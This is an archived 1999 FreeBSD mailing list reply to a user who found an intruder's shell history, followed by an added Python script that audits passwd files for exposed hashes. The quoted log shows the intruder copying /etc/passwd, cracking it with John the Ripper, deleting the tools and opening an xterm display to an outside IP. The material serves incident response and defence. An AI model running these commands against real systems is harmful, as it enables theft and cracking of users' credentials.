Date: Wed, 24 Mar 1999 02:55:32 -0800 (PST)
From: <unknown@riverstyx.net>
To: pirat@center.oaep.go.th
Cc: questions@FreeBSD.ORG
Subject: Re: /etc/passwd file
Message-ID: <Pine.LNX.4.04.9903240254240.19060-100000@hades.riverstyx.net>
In-Reply-To: <XFMail.990324171835.pirat@center.oaep.go.th>

if you aren't shadowed, and you have weak passwords, chances are he's got
a good sized chunk of your password file. the program he's using is john
the ripper, which is a crack clone, which attempts to guess passwords by
encrypting strings and comparing to the encrypted password...

On Wed, 24 Mar 1999 pirat@center.oaep.go.th wrote:

> hi,
>
> i notice recently that someone is using my /etc/passwd file, please see the
> following history.
>
>
> ===begin===
> ls -l
> cd /etc
> ls *host*
> ls -l | less
> ls -l | more
> w
> l s-l
> cd
> ls -l
> rm M-cjohn-1.5.tar.gz
> ls -l
> rm *.gz
> ls
> cd john-1.5
> ls -l
> cd run
> l s-l
> ls -l
> cp /etc/passwd .
> ls -l
> ./john -single passwd
> ls -l
> cat password.lst
> ^X
> ls -l
> cd ..
> ls -l
> cd doc
> pico .
> w
> xterm -display 202.44.64.146:0.0 &
> set
> env
> ping 202.44.64.146
> ping 202.44.64.145
> pwd
> l s-l
> ls -l
> cd ../run
> l s-l
> ls -l
> mv passwd passwd.1
> john -single passwd
> ./john -single passwd
> pico
> pwd
> ls -l
> ./john -si passwd.1
> ./john -show passwd.1
> cat passwd.1
> ls -l
> cd /etc
> ls -l sha*
> ls
> ls -l passwd*
> ls -l sh*
> cd
> pico
> pwd
> l s-l
> ls -l
> rm -rf john-1.5
> l s-l
> ls -l
> ping center
> ping 202.44.64.144
> arp -a
> ping 202.44.64.144
> cd /etc
> ls -l hos*
> cat host.conf
> cat hosts
> ls -l
> pilot
> exit
> ===end of history===
>
>
> shall he finally know the user's password from the sequence of his action shown
> above ?
>
> apologize me for asking this kind of question here. but many thanks in advance.
>
>
> with regards,
> psr
> ----------------------------------
> E-Mail: pirat@center.oaep.go.th
> Date: 24-Mar-99
> Time: 17:06:20
>
> This message was sent by XFMail
> ----------------------------------
>
>
> To Unsubscribe: send mail to majordomo@FreeBSD.org
> with "unsubscribe freebsd-questions" in the body of the message
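
The reply turns on whether the copied file actually contains password hashes. A small audit of passwd-format text for that condition follows, as an added example that is not part of the original message; the function names and sample entries are constructed for illustration, and the placeholder and lock-prefix conventions it assumes are stated in the comments.

```python
# Added example: audit passwd-format text for password hashes readable by local users.
# Conventions assumed: "*" or "x" means the hash lives elsewhere (master.passwd / shadow);
# a "*LOCKED*" (FreeBSD pw lock) or "!" (Linux passwd -l) prefix locks the account
# but leaves any hash that follows it in the file.

def classify(field):
    """Classify the second (password) field of one passwd entry."""
    if field == "":
        return "empty"          # account has no password at all
    if field in ("*", "x"):
        return "shadowed"       # nothing here for a cracker to work on
    rest = field
    if rest.startswith("*LOCKED*"):
        rest = rest[len("*LOCKED*"):]
    rest = rest.lstrip("!")
    if rest in ("", "*"):
        return "locked"         # lock marker only, no hash behind it
    return "exposed"            # a real hash: crackable offline once copied

def audit_passwd(text):
    """Return {category: [usernames]} for passwd-format text."""
    report = {"empty": [], "shadowed": [], "locked": [], "exposed": []}
    for lineno, line in enumerate(text.splitlines(), 1):
        line = line.strip()
        if not line or line[0] in "#+-":   # comments and NIS compat entries
            continue
        fields = line.split(":")
        if len(fields) < 7:                # passwd(5) has 7 fields, master.passwd 10
            raise ValueError(f"line {lineno}: malformed entry")
        report[classify(fields[1])].append(fields[0])
    return report

# Constructed sample entries; the hash strings are made up, not real hashes.
SAMPLE = """\
root:*:0:0:Charlie &:/root:/bin/csh
alice:abJnggxhB/yWI:1001:1001:Alice:/home/alice:/bin/sh
bob:$1$constructed$0123456789abcdefghijkl:1002:1002:Bob:/home/bob:/bin/sh
carol::1003:1003:Carol:/home/carol:/bin/sh
dave:*LOCKED*$1$constructed$0123456789abcdefghijkl:1004:1004:Dave:/home/dave:/bin/sh
eve:!!:1005:1005:Eve:/home/eve:/bin/sh
"""

if __name__ == "__main__":
    for category, users in audit_passwd(SAMPLE).items():
        print(f"{category:9} {', '.join(users) or '-'}")
```

Only the `exposed` and `empty` entries give someone holding a copy of the file anything to work with. Note that `dave` is reported as exposed: a lock prefix disables login but leaves the hash in place.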